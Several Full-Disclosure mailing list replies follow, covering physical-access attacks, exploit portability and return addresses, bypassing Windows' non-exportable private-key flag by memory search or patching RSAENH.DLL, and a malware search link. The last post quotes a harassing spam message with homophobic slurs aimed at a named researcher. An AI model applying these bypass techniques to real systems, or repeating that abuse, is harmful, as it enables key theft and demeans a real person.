cardoso a écrit : Exactly. A few years ago I used to deal with linux fanboys showing them the cute trick of linux single at boot time. After a few hours begging for the admin password, I teached the trick and they usually stopped the brag about how security Linux was. You know we do appreciate your work with crackheads. Local attacks against windows are easier imho thoo. endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Putty Proxy login/password discolsure....
Paul Schmehl a écrit : Not even that is true. You can always *access* the data. Depending upon the type and complexity of the encryption, it may take a while to decrypt, but once I have physical access, I have both the data and the time to do just that. *Most* of the encryption schemes for things like passwords that several times the age of the universe is a while thoo. used to be stored in plain text (until somebody pointed it out) are fairly trivial and easily broken. Even if they're not, I may be able to use the program itself to decrypt the password and then capture it in plain text in memory. you know you can use pretty strong encryption on Hd, right ? Again, once you have physical access, it's game over, plain and simple. Paul Schmehl ([EMAIL PROTECTED]) Regards, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fire and forget exploits?
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi, Brendan Dolan-Gavitt wrote: Hi, I'm looking for examples of (remote) security vulnerabilities whose exploitation involves no guesswork--eg, no bruteforcing the return address, or altering your exploit based on the server's response, etc. I guess you're thinking about _remote_ exploitation ? You don't have to guess anything for a local bo for instance.. Anyway : It seems like this kind of exploit is dying out, particularly as different flavors of Linux proliferate, each with their own slightly Target the kernel ? Use linux-gate.so ? Portability of your exploit will greatly depend on how you choose to exploit the vulnerability, since it's quite common to have to choose btw several exploitation scenarii.. different libc and userland; in the Windows world, however, we still find universal exploits that work on NT4/2k/XP over a variety of service packs. the language also affects some pointers. Anyway, if you need let s say a jmp esp , you can try to choose one location in memory that contains this opcode for several SP/languages. But I don't think you can prove any exploit will be universal... (can you ? ;) Anyways, if anyone has come across things like this, I'd greatly appreciate hearing about it. I'm working on some new methods to deliver exploits at once while minimizing recon. Thanks, Brendan Dolan-Gavitt Cheers, endrazine- -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2.2 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFOPC7zX6JtL3KgRURAqAyAKDaza2Khkjv9qVd9NZAtu/xjHjxFgCg2z8D V4wY66PaL6iTgk7QrQg31jc= =pkfO -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cloning PC / run in VMware
Nicolas RUFF wrote: Thanks for the input. But the problem is, that the private key of the certificate cannot be exported (not allowed by the certificate store of windows) - so this doesn't work... Don't tell me a simple greyed out checkbox can stop you ... ^--- foudstone's showwin.exe usually does the trick http://www.foundstone.com/resources/proddesc/showin.htm http://2005.hack.lu/wiki/images/b/ba/Hacklu_catch_the_key.ppt Regards, - Nicolas RUFF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] cloning PC / run in VMware
[EMAIL PROTECTED] wrote: Hi there Thanx for information... Will try my best :) Have a nice day, GreetZ from IndianZ Don't tell me a simple greyed out checkbox can stop you ... ^--- foudstone's showwin.exe usually does the trick Actually, it's a bit harder. At export time, the Crypto provider will check the non exportable flag, even if you have ungreyed the checkbox. From here you have 2 choices : - Searching for the private key blob in the process memory. - Patching the Crypto provider to kill the check (harder, because of WFP and some internal checksums inside Crypto providers - e.g. RSAENH.DLL). if you're ready to do some reverse engineering, then editing the resources of the app would be better than using showwin. if they took the time to add checksums, the first solution you mentioned will prolly be faster. /my two cents I have not heard of any readily usable code on the Internet, but looking at the slides it should not be too hard to reproduce. Regards, - Nicolas RUFF ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ GreetZ from IndianZ mailto:[EMAIL PROTECTED] http://www.indianz.ch ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google Malware Search
H D Moore wrote: http://metasploit.com/research/misc/mwsearch/?q=bagle Enjoy, -HD ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ HD : I like the idea :) http://metasploit.com/research/misc/mwsearch/?q=.btnG=Malware+Search (anyone has a better dork so far ?) Cheers, endrazine- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] ALL_HAIL_THIS_IS_THE_GADI_EVRON_OF_THE_FAGGOT_FUTURE
Hey you, fucker fulling my mailbox : if you were a hacker you'd have better things to do (we're all lacking time here) Now let us work and go back to WoW endra- Future Gadi Evron wrote: Gadi Evron is a known leader in the world of Internet security operations, and especially in the realm of future faggot hacking and golden showers. He was previously the Israeli Government Internet Faggotry Operations Manager, as well as the Israeli Government TWINK Manager. Today, he manages the SecuriTeam portal and works for Israeli-based Beyond Security. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
